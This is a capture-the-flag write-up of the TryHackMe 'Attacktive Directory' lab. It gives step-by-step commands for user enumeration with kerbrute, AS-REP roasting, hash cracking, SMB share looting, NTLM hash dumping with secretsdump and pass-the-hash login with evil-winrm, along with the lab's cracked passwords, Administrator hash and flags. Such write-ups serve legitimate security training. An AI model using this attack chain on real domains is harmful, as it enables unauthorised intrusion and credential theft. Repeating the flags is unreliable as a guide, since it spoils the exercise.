TRYHACKME ATTACKTIVE DIRECTORY ROOM WRITE-UP

On connection

Running nmap to view open ports and services

Add the dns domain name to the /etc/hosts then access the IP via the browser

On the browser:

This IIS from Microsoft

Try to enumerate any user using the enum4linux tool

We got nothing

Installing the tool kerbrute for enumeration

The above shows different commands used for the tool to enumerate different items e.g. users through userenum, — dc <ip address> -d <domain name> and a list of common usernames.

Command:

./kerbrute_linux_amd64 userenum — dc 10.10.61.114 -d spookysec.local userlist.txt

The tool provides us with different usernames matching the userlist.txt

We can now use the tool impacket to enumerate users as well as do ASREPRoasting.

ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

The script is GetNPUsers.py

Command: GetNPUsers.py spookysec.local/ -usersfile userenum.txt -format hashcat -outputfile ./getnpusers -dc-ip 10.10.61.114

Checking the content of the output file

We identify that only the user svc-admin is susceptible to ASReproasting

We then make use of hashcat to crack the hash and get the password

Password = management2005

Alternatively, one can use john the ripper to crack, much simpler

Get SMB shares using SMB client tool

Command: smbclient -L 10.10.61.114\\ -U svc-admin

When prompted for password, use the one we found above for svc-admin user

Try to access the shares one by one to find out which one you are allowed to access. In this case, we are allowed to access the backup share

Command: smbclient -U svc-admin //10.10.61.114/backup

Use command more to read the content of the file

Output:

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decode in base64 to get the password

Command: echo “YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw” | base64 -d

User is backup password is backup@spookysec.local and the password is backup2517860

Dump the hashes for all users.

Command : secretsdump.py spookysec.local/backup:’backup2517860'@10.10.61.114 -just-dc-ntlm

Interesting user and hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

We can now use evil-winrm to login to the user without having to crack the hashes

Command : evil-winrm -i 10.10.61.114 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Now logged in, find out where you are in the system.

Navigate through and look for the flag

Its in the desktop directory under a filename root.txt

Flag for administrator= TryHackMe{4ctiveD1rectoryM4st3r}

Move to the users directory and get to each user’s directory to find the flags

Flag for svc-admin = TryHackMe{K3rb3r0s_Pr3_4uth}

Flag for backup = TryHackMe{B4ckM3UpSc0tty!}

Have fun!!